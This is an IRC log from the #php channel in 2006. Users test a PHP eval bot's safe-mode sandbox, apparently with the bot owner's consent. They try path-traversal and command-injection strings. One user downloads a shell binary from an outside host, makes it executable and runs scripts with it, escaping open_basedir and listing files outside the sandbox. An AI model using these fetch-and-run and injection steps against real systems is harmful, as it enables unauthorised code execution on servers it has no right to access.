| |
| |
| |
|
Page: 1 2 3 4 5 6 7 8 9 10 11 12 13
Comments:
<0> no, don't listen to jed
<1> first off, you'd need to download a statically linked sh to /home/poutine/safe, then you'd have to make a shell script, and then execute said shell script
<2> you were right
<3> !php $output = shell_exec('ls -l'); echo $output;
<4> Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<2> !php system('x=1;echo $x');
<4> /home/poutine/safe/x=1;echo: not found
<1> not to mention you'd have to find a FreeBSD 4.11 system get the statically compiled sh from :)
<1> !php system('uname -a'
<1> !php system('uname -a');
<4> Parse error: syntax error, unexpected ';' in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> FreeBSD mudportal2.mudportal.com 4.11-STABLE FreeBSD 4.11-STABLE #1: Thu Jul 7 21:18:56 EDT 2005 poutine@mudportal2.mudportal.com:/usr/obj/usr/src/sys/PRIVATE i386
<2> you copied a uname binary in?
<3> !php phpinfo()
<4> phpinfo()
<4> PHP Version => 5.1.1
<4> System => FreeBSD mudportal2.mudportal.com 4.11-STABLE FreeBSD 4.11-STABLE #1: Thu Jul i386
<4> Build Date => Dec 30 2005 11:46:22
<1> I own MudPortal, I'm not restricted to safe mode and such
<2> oh I see
<1> I think sh/bash/csh is what reads the top line of the script to find out what the interpreter is
<1> something that probably isn't done when openbasedir is in effect
<3> Was MudPortal, a complex bot to write poutine?
<1> no
<2> !php system("../../../usr/bin/id");
<4> Warning: system(): No '..' components allowed in path in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<1> MudPortal is an eggdrop
<1> the PHP module just uses the commandline CLI
<3> CLY?
<3> CLI?
<1> it does some CTCP filtering, user access control, and flood/repeat limiting, but that's about it
<1> t0ke, yes php /home/poutine/safe/raw.php
<1> !php readfile('/home/poutine/safe/raw.php');
<4> <?php
<4> include('/home/poutine/safe/custom.php');
<4> $nick = 'poutine';
<4> $host = '~poutine@cpe-65-185-39-148.columbus.res.rr.com';
<4> $chan = '#php';
<1> etc etc
<2> !php system('\.\./test');
<4> /home/poutine/safe/test: not found
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh";)); system("/home/poutine/safe/sh goop.sh");
<4> /home/poutine/safe/sh: permission denied
<3> sweet
<0> !php $p = "/home/poutine/safe"; chmod("$p/sh", "a+x");
<0> !php system("/home/poutine/safe/sh goop.sh");
<4> /home/poutine/safe/sh: permission denied
<0> hm.
<2> !php system('\.\./\.\./\.\./usr/bin/id');
<4> /home/poutine/safe/id: not found
<0> that's just odd
<5> use more slashes
<0> that's a 4.11 sh
<1> ---------- 1 poutine wheel 106828 Mar 6 19:03 sh
<5> i'm sure it will work with enough slashes
<5> lol
<2> !php system('\.\.\/\.\./\.\.\/usr\/bin\/id');
<0> the hell?
<4> /home/poutine/safe/id: not found
<1> try now
<2> guess not
<0> !php system("/home/poutine/safe/sh goop.sh");
<4> goop.sh: Can't open goop.sh: No such file or directory
<0> well, i'm executing sh
<3> !php echo date('d','m','Y');
<0> !php system("/home/poutine/safe/sh ~poutine/safe/goop.sh");
<1> goop.sh has no permissions also
<4> Warning: date() expects at most 2 parameters, 3 given in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> ~poutine/safe/goop.sh: Can't open ~poutine/safe/goop.sh: No such file or directory
<1> try again jed
<0> !php system("/home/poutine/safe/sh ~poutine/safe/goop.sh");
<4> ~poutine/safe/goop.sh: Can't open ~poutine/safe/goop.sh: No such file or directory
<0> !php system("/home/poutine/safe/sh /home/poutine/safe/goop.sh");
<1> just goop.sh
<4> lol
<0> there it is
<3> !php echo date('d,m,Y');
<4> 06,03,2006
<0> !php unlink("/home/poutine/safe/sh");
<0> !php unlink("/home/poutine/safe/goop.sh");
<0> so chmod() is somehow filtered
<0> or we're doing it wrong
<1> !func chmod
<4> chmod (PHP 3, PHP 4, PHP 5) -- Changes file mode
<4> bool chmod ( string filename, int mode )
<4> http://www.php.net/manual/en/function.chmod.php
<0> hm
<5> hmmmm
<5> INT
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh";)); chmod("$p/sh", 777);
<0> hmmm, it takes string too according to the documentation
<0> don't question my authority biznatch
<6> 0777 not 777
<6> you need to specify octal
<0> DUR
<6> biotch
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh", file_get_contents("http://jed.bz/sh";)); chmod("$p/sh", 0777);
<4> Warning: file_put_contents(/home/poutine/safe/sh): failed to open stream: Permission denied in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<5> chmod("/somedir/somefile", "u+rwx,go+rx"); // string; incorrect
<2> !php system('x || /usr/bin/id');
<4> /home/poutine/safe/x: not found
<5> Note that mode is not automatically ***umed to be an octal value, so strings (such as "g+w") will not work properly.
<5> biznatch yourself
<0> ****ing a, they changed it since 4.*
<2> would I have seen the 2nd line?
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/sh2", file_get_contents("http://jed.bz/sh";)); chmod("$p/sh", 0777);
<1> worked
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/lol.sh", "echo lol; cd ../../; pwd\n");
<0> !php $p = "/home/poutine/safe"; chmod("$p/lol.sh", 0777);
<0> !php $p = "/home/poutine/safe"; system("$p/sh2 $p/lol.sh");
<4> /home/poutine/safe/sh2: permission denied
<2> the one chmod was for $p/sh
<6> idd
<0> !php $p = "/home/poutine/safe"; chmod("$p/sh2", 0777);
<0> !php $p = "/home/poutine/safe"; system("$p/sh2 $p/lol.sh");
<4> lol
<4> /usr/home
<1> wow
<0> ut-oh spaghetti-o
<1> well there's open basedir for you
<3> So what have you guys achieved?
<6> root!
<1> byp***ed open basedir
<3> whats that mean in lamens poutine?
<6> hax0rd!
<3> lol
<1> t0ke, he h4x0r3d teh g1bs0n
<3> :D
<0> !php $p = "/home/poutine/safe"; file_put_contents("$p/blargh.sh", "ls -l /home/poutine"); chmod("$p/blargh.sh", 0777); system("$p/sh2 $p/blargh.sh");
<4> total 3530
<4> drwxr-xr-x 14 poutine wheel 1536 Mar 6 19:00 eggdrop
<4> -rw-r--r-- 1 poutine wheel 2532694 Mar 22 2005 eggdrop.tar.bz2
<4> drwxr-xr-x 13 poutine wheel 1536 Jul 5 2005 eggdrop1.6.15
<4> drwxr-xr-x 10 poutine wheel 512 Aug 22 2004 eggdrop1.6.17
<1> give me a second jed
<6> you dont need to chmod the shell script if you're going to run it like that (i dont think)
<0> !php $p = "/home/poutine/safe"; unlink("$p/sh"); unlink("$p/sh2"); foreach(glob("$p/*.sh") as $f) unlink($f);
<4> Warning: unlink(/home/poutine/safe/sh): No such file or directory in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<4> Warning: unlink(/home/poutine/safe/sh2): No such file or directory in /usr/home/poutine/safe/raw.php(6) : eval()'d code on line 1
<0> neato, he nuked 'em
<0> saved me some trouble
<0> now before you kids gets ideas
<2> wouldn't be hard to build a static sh on my own freebsd account, I wanted to find a syntax trick, though
<0> you know
<0> it really feels like i accomplished something today
<0> now i'm happy
<3> Well done!
<1> !php echo 'test';
Return to
#php
or
Go to some related
logs:
print preg_match results
#linux
annı sikim
perl Regex-off
PAPBU
#india
#worldchat
daneish google
liulion
#chat-world
|
|